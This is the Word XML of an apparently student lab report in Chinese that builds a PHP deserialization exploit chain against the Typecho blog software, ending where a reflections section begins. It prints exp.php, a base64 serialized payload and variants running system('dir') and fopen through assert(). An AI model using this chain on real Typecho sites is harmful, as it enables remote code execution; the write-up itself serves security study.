    <w:p w14:paraId="03FA897F" w14:textId="750614DB" w:rsidR="00A34B98" w:rsidRDefault="001D2596" w:rsidP="00A34B98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对象分析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055B1A69" w14:textId="2F491DE0" w:rsidR="001D2596" w:rsidRDefault="00305098" w:rsidP="001D2596">
      <w:pPr>
        <w:pStyle w:val="a5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77597DAF" wp14:editId="7688D0AD">
            <wp:extent cx="5274310" cy="1106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098">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>图中红框部分意为</w:t>
      </w:r>
      <w:r w:rsidRPr="00305098">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidR="00BB11C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r w:rsidRPr="00305098">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>个关联数组</w:t>
      </w:r>
      <w:r w:rsidRPr="00305098">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>’age[Bill]’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>的意思为访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>Bill</w:t>
      </w:r>
      <w:r w:rsidR="00BB11C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>的value，本文语句为</w:t>
      </w:r>
      <w:r w:rsidR="00BB11C9" w:rsidRPr="00BB11C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>$db = new Typecho_Db($config['adapter']);</w:t>
      </w:r>
      <w:r w:rsidR="00BB11C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>故而需要创建一个key为adapter的array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295FEC3D" w14:textId="77777777" w:rsidR="00FC1B64" w:rsidRDefault="00BB11C9" w:rsidP="001D2596">
      <w:pPr>
        <w:pStyle w:val="a5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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB11C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>攻击链中，期望触发Typecho_Feed的__toString()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>方</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB11C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>法</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB11C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC1B64">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5857E019" w14:textId="372896FA" w:rsidR="00BB11C9" w:rsidRDefault="00BB11C9" w:rsidP="00FC1B64">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="1140" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB11C9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>public function __toString(){ $this-&gt;item['author']-&gt;screenName; } 因此，key为“adapter”的value应该为Typecho_Feed对象</w:t>
      </w:r>
      <w:r w:rsidR="00FC1B64">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>。得到语句：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6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FC1B64" w14:paraId="41746E30" w14:textId="77777777" w:rsidTr="00626EB2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7156" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A0FEE59" w14:textId="77777777" w:rsidR="00FC1B64" w:rsidRDefault="00FC1B64" w:rsidP="00FC1B64">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$exp = array( 'adapter' =&gt; new Typecho_Feed() ); echo base64_encode(serialize($exp)); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="011944E3" w14:textId="203205A9" w:rsidR="00FC1B64" w:rsidRDefault="00FC1B64" w:rsidP="00FC1B64">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B34B45C" w14:textId="6F6123FF" w:rsidR="00FC1B64" w:rsidRDefault="00626EB2" w:rsidP="00FC1B64">
      <w:pPr>
        <w:pStyle w:val="a5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2E7A837C" wp14:editId="2030134D">
            <wp:extent cx="5274310" cy="1315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E239" w14:textId="04A66BCF" w:rsidR="00626EB2" w:rsidRDefault="00626EB2" w:rsidP="00626EB2">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="1140" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00626EB2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>说明，item应该是个array，其key为author，value为Typecho_Request对象。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>得到语句：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6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626EB2" w14:paraId="0033A3C5" w14:textId="77777777" w:rsidTr="00631B15">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7156" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="184A5C15" w14:textId="77777777" w:rsidR="00626EB2" w:rsidRDefault="00626EB2" w:rsidP="00626EB2">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">class Typecho_Feed { private $item; public function __construct(){ $this-&gt;item = array( 'author' =&gt; new Typecho_Request(), ); } </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3254F479" w14:textId="245CD454" w:rsidR="00626EB2" w:rsidRDefault="00626EB2" w:rsidP="00626EB2">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D716FF0" w14:textId="21233123" w:rsidR="003B6DC8" w:rsidRPr="003B6DC8" w:rsidRDefault="003B6DC8" w:rsidP="003B6DC8">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="1140" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00631B15">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>通过构造函数实现两个私有变量的赋值 （1）Filter[0]是要调</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00631B15">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>的函数；（</w:t>
      </w:r>
      <w:r w:rsidRPr="00631B15">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>2）screenName是要输</w:t>
      </w:r>
      <w:r w:rsidRPr="00631B15">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>⼊</w:t>
      </w:r>
      <w:r w:rsidRPr="00631B15">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>的参数</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="004B1C8A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>assert()函数</w:t>
      </w:r>
      <w:r w:rsidR="004B1C8A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>如果该函数的参数是字符串，那么该字符串会被assert()当做PHP代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F82A2B0" w14:textId="2B0FEFDB" w:rsidR="00626EB2" w:rsidRPr="00631B15" w:rsidRDefault="00631B15" w:rsidP="003B6DC8">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="1140" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>得到语句：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6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631B15" w14:paraId="440B3538" w14:textId="77777777" w:rsidTr="00631B15">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="698786AA" w14:textId="77777777" w:rsidR="00631B15" w:rsidRDefault="00631B15" w:rsidP="00631B15">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>class Typecho_Request { private $_params = array(); private $_filter = array(); public function __construct(){ $this-&gt;_params['screenName'] = 'phpinfo()'; $this-&gt;_filter[0] = 'assert'; }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B28B742" w14:textId="50C67BC8" w:rsidR="00631B15" w:rsidRDefault="00631B15" w:rsidP="00631B15">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07547DFD" w14:textId="5ACE3192" w:rsidR="00631B15" w:rsidRDefault="004718C1" w:rsidP="004B1C8A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由上述分析得到利用代码。建造e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>xp.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>文件，代码为：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4718C1" w14:paraId="0A7808BD" w14:textId="77777777" w:rsidTr="004718C1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="344D09A7" w14:textId="2F9D11CF" w:rsidR="004718C1" w:rsidRDefault="0066715D" w:rsidP="004718C1">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>/*exp.php*/ item = array( 'author' =&gt; new Typecho_Request(), ); } } class Typecho_Request { private $_params = array(); private $_filter = array(); public function __construct(){ $this-&gt;_params['screenName'] = 'phpinfo()'; $this-&gt;_filter[0] = 'assert'; } } $exp = array( 'adapter' =&gt; new Typecho_Feed() ); echo base64_encode(serialize($exp)); ?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3350954B" w14:textId="043076F0" w:rsidR="004718C1" w:rsidRDefault="00CB3964" w:rsidP="00B9023D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访问e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>xp.php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F88F6" w14:textId="2E719893" w:rsidR="00CB3964" w:rsidRDefault="00994FF3" w:rsidP="00CB3964">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00994FF3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22810314" wp14:editId="0A3F0363">
            <wp:extent cx="5274310" cy="620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73F0" w14:textId="77777777" w:rsidR="00994FF3" w:rsidRDefault="00994FF3" w:rsidP="00994FF3">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>ayload为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>YToxOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6MTp7czoxODoiAFR5cGVjaG9fRmVlZABpdGVtIjthOjE6e3M6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F70E4D" w14:textId="4630FDF0" w:rsidR="00994FF3" w:rsidRDefault="00AE7E53" w:rsidP="00994FF3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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE7E53">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>通过get请求的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>方</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7E53">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>式传递给</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7E53">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>typecho.php后</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7E53">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE7E53">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>访问typecho.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608AAD83" w14:textId="3ED2BF14" w:rsidR="00E15A37" w:rsidRDefault="00145E79" w:rsidP="00E15A37">
      <w:pPr>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="15B76F89" wp14:editId="393EA82C">
            <wp:extent cx="5263515" cy="3105150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
            <wp:docPr id="5" name="图片 5" descr="b362367c6b4ac567ffca370ea046ead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362367c6b4ac567ffca370ea046eadd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422F" w14:textId="4FD00653" w:rsidR="00FF7B6C" w:rsidRDefault="00FF7B6C" w:rsidP="00FF7B6C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将p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>hp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>nfo()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>改为s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>ystem(“dir”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB8DB1C" w14:textId="7A8F84BA" w:rsidR="00FF7B6C" w:rsidRDefault="00FF7B6C" w:rsidP="00FF7B6C">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left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65C1EFD0" wp14:editId="0554044D">
            <wp:extent cx="5274310" cy="3048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C6F5" w14:textId="010110B8" w:rsidR="00FF7B6C" w:rsidRDefault="004E3F1E" w:rsidP="00FF7B6C">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="lef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再次获取payload并访问得：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F154BB9" w14:textId="08BE6FD7" w:rsidR="004E3F1E" w:rsidRDefault="004E3F1E" w:rsidP="00FF7B6C">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="57276054" wp14:editId="1CA750BB">
            <wp:extent cx="5267325" cy="1219835"/>
            <wp:effectExtent l="0" t="0" r="5715" b="14605"/>
            <wp:docPr id="7" name="图片 7" descr="0ab07cfb8f23c76a1a48946dc0911a9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ab07cfb8f23c76a1a48946dc0911a9a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5169" w14:textId="7420A990" w:rsidR="00D07CA5" w:rsidRPr="00C259D4" w:rsidRDefault="00C259D4" w:rsidP="00C259D4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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改语句为：</w:t>
      </w:r>
      <w:r>
        <w:t>$this-&gt;_params['screenName'] = 'fopen(\'newfile.txt\' , \'w\');'; $this-&gt;_filter[0] = 'assert';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2415FDF0" w14:textId="7C5FCACC" w:rsidR="00C259D4" w:rsidRDefault="00C259D4" w:rsidP="00C259D4">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left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0336F616" wp14:editId="0686CC7F">
            <wp:extent cx="5274310" cy="3048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E9D3" w14:textId="3F8D392B" w:rsidR="00C259D4" w:rsidRDefault="00C259D4" w:rsidP="00C259D4">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="lef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获取payload访问得：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D6FFDD" w14:textId="4563ABB2" w:rsidR="00C259D4" w:rsidRDefault="00C259D4" w:rsidP="00C259D4">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="223F329B" wp14:editId="6D85190E">
            <wp:extent cx="4099560" cy="1074420"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="14" name="图片 14" descr="23ba87a722cbe67285da1686d168534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3ba87a722cbe67285da1686d168534e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91A" w14:textId="3F08B888" w:rsidR="00C259D4" w:rsidRDefault="00C259D4" w:rsidP="00C259D4">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="lef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查看本地目录得：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9BFC8B" w14:textId="42EEB144" w:rsidR="00C259D4" w:rsidRPr="00D07CA5" w:rsidRDefault="001D6259" w:rsidP="00C259D4">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A1343AF" wp14:editId="69CB63E0">
            <wp:extent cx="5274310" cy="22815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B03" w14:textId="687C81E5" w:rsidR="003410D5" w:rsidRPr="00397FC8" w:rsidRDefault="003410D5" w:rsidP="00397FC8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397FC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
        <w:t>心得体会</w:t>
      </w:r>
      <w:r w:rsidRPr="00397FC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BD3CD9" w14:textId="46D40118" w:rsidR="003410D5" w:rsidRPr="003410D5" w:rsidRDefault="00435627" w:rsidP="00435627">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00435627">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
